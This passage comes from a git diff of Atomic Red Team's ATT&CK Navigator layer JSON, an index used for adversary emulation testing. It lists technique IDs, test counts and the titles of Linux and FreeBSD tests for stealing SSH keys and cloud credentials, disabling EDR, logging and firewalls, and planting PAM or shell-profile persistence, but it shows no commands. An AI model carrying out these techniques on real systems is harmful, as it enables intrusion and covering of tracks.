Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C 
source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users 
GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment 
variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- 
Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 9f48ef895..8898aefe0 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":47,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":55,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 